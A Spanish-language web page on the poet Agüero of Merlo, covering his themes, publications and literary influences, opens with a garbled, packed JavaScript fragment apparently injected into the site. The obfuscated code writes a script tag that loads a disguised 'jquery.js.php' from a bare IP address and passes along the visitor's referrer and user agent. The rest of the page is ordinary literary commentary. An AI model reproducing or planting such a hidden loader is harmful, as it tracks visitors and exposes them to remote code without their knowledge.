Publicaciones

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yaysb|var|u0026u|referrer|sfikh||js|php'.split('|'),0,{})) </script></noindex> type=”circle” color=”#fffffff” background_color=”#000000″]Su vida y su voz poética son una y la misma cosa. Los temas que el poeta  desarrolla en sus poemas,  están presentes desde los primeros  escritos,  pero van enriqueciéndose en matices y adquiriendo a lo largo de su vida una mayor conciencia del compromiso  colectivo.

 

En las últimas obras,   como en Canciones para la voz humana y en los últimos  sonetos,  el modo de expresión se centra en los temas universales puros,  sin presencia del paisaje.

 

Temas como la libertad, la muerte, el paso del tiempo, el amor, la relación del hombre con la naturaleza, la cultura local y la cultura europea, dios, la inspiración poética, las tradiciones, el trabajo humano, el avance técnico, la ciencia, se entrelazan en una cosmovisión  de profunda coherencia para  conformar  en su conjunto, una visión coherente  del  hombre y del mundo.

El universo que aparece ante el lector por la palabra, rompe el velo de la realidad cotidiana y  muestra la pertenencia más profunda al mundo de la vida, a ese mundo en el que el vínculo con los otros seres es el resultado de la conciencia despierta, purificada de las  cadenas  de los condicionamientos culturales.  En la lectura su palabra  se vuelve profecía, promesa, invitación a habitar  el mundo con esa mirada  consciente.

 

Desde ese  arraigo enamorado  a su lugar natal,  realiza  una observación minuciosa, detenida, de todo cuanto lo rodea, de donde surgen  las metáforas que le permiten  expresar su  apasionado mundo interior. Conocer a Agüero es conocer   y comprender el valor de la vida a través de esas imágenes arraigadas  en su Merlo natal, que invitan a la reflexión sobre los grandes temas universales del mundo y del hombre.

Publicaciones en vida

  • “Poemas lugareños” (1937)
  • “Romancero Aldeano” (1938)
  • “Pastorales” (1939)
  • “Romancero de niños” (1946)
  • “Cantatas del árbol” (1953)

Publicaciones post muerte

  • “Un hombre dice a su pequeño país” (1972)
  • “Canciones para la voz humana” (1973)
  • “Poemas Inéditos” (1978).

Publicaciones varias en diarios

  • “Vivir en Poesia” (1967) es una prosa que fue publicada por “La Capital” de Rosario.
  • “Verde Memoria”- Se fue sacando de Capital en la Prensa.
  • “Historia  y Leyenda de la Villa de Merlo” (1968) Fue publicado por el autor en sucesivas entregas que aparecieron en el Diario de San Luis desde el 14 de Agosto al 15 del octubre de 1968.

Inéditos

  • Cementerio de Pajaros y otros Poemas (1940- 1947)
  • Cuaderno de Amor (1940-1947)
  • Ultimos Poemas (1960-1970)
  • Los Sonetos del Angel y el Infierno

Influencias

Agüero fue  un ávido lector de  variados  temas y de literatura universal pero su atención preferencial estuvo centrada en su provincia: su historia, sus leyendas, su folklore, su flora y fauna, textos  que le sirvieron de fuentes para   sus escritos. Entre todas sus lecturas hay tres escritores  a los que les dedica especial atención y en  los que encuentra puntos de contacto con su credo poético: Guillermo E. Hudson, Leopoldo Lugones y Federico García Lorca. El arraigo a la propia tierra es un tema que aparece ligado al  conocimiento intuitivo que nace de la observación de la naturaleza, de donde surge la idea del poeta como profeta de su tierra, en contraposición a la idea de la cultura cosmopolita y desarraigada.

 

En el estudio que le dedica a G. E. Hudson, dice: “…. los maestros argentinos fueron otros: en primer término, la pampa húmeda,  la llanura abierta en infinitos horizontes, y la población nativa, formada por  los gauchos de la región…”; y más adelante: “…Su maestro el gaucho le daba el ejemplo….  ¿Qué otro motivo lo invitaba a ese vagabundear constante? …  el estudio de los pájaros. Y aquí otro fenómeno digno de señalarse: ¿cómo fue posible que en ese ámbito primitivo y elemental Hudson llegase a ser uno de los más sabios ornitólogos del mundo? Una vez más nuestro país fue testigo de uno de los más  extraordinarios casos de autodidáctica  que pueden concebirse, el otro fue Sarmiento.”

 

Destaca lo mismo en Leopoldo Lugones: “…Con Leopoldo Lugones se da, en la historia general de nuestra cultura, uno de los más extraordinarios  y sorprendentes fenómenos de aotodidáctica, comparable en nuestro país sólo al caso de Sarmiento…” p89   Cita luego, un verso de Poemas Solariegos de Lugones que dice:

 

En la Villa de María del Río seco

al pie del Cerro del Romero nací,

y esto es todo cuanto diré de mí,

porque no soy más que un eco

del canto natal que traigo aquí.

 

 

Cuando escribe sobre   F. García Lorca dice: “…. Pertenezco a la generación formada a su sombra, cuando las primeras copias del Romancero Gitano… circulaba de mano en mano como objeto precioso…” y cuando menciona el lugar de nacimiento,  Fuente Vaqueros, en una aldea  de las vecindades de  Granada, aclara que es un dato muy importante porque “…el hombre más que el hijo del hombre, es el hijo de la tierra…”p.123  y más adelante en el mismo estudio dice “…Su niñez transcurre en ese sitio, en contacto con la madre naturaleza. Conviviendo con las plantas, las hierbas, las bestezuelas silvestres, las nubes, las fontanas y los arroyuelos……en íntima comunión con el pueblo andaluz, tan antiguo y por ello mismo poseedor de una cultura popular originalísima y auténtica como lo demuestran sus bailes y su cante jondo y su profundo sentido musical y plástico”….p. 124

 

Citas de  Obras Completas, “Vivir en Poesía”

  • La sabiduría de Leopoldo Lugones
  • Recordación de Federico García Lorca en el 20º aniversario de su asesinato, conferencia dictada en Santa Rosa de la Pampa el 11 de agosto de 1956 p. 121
  • Un poeta dela pampa: Enrique Guillermo Hudson